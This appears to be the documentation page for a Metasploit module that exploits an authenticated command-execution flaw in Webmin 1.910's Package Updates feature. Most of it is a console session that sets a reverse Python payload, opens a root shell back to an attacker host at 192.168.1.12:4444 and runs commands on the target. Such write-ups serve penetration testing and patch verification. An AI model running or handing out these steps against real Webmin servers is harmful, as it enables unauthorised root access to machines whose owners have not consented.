1.8 KiB
1.8 KiB
Description
This module exploits an arbitrary command execution vulnerability in Webmin 1.910 and lower versions. any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.
Vulnerable Application
This module has been tested with Webmin 1.910
Verification Steps
use exploit/lunix/http/webmin_packageup_rceset rhosts <rhost>set username <username>set password <password>exploit
Scenarios
Tested Webmin 1.910 on Debian Linux 4.19.28-2kali1 x64
msf5 >
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME rce
USERNAME => rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD password
PASSWORD => password
msf5 exploit(linux/http/webmin_packageup_rce) > check
[*] NICE! rce has the right to >>Package Update<<
[+] 192.168.1.9:10000 - The target is vulnerable.
msf5 exploit(linux/http/webmin_packageup_rce) > exploit
[*] Started reverse TCP handler on 192.168.1.12:4444
[+] Session cookie: 1947b5dfd62403b8f1f58f497e88b1e5
[*] Attempting to execute the payload...
[*] Command shell session 12 opened (192.168.1.12:4444 -> 192.168.1.9:47552) at 2019-06-16 18:21:46 -0400
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux AkkuS 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
pwd
/usr/share/webmin/package-updates/
exit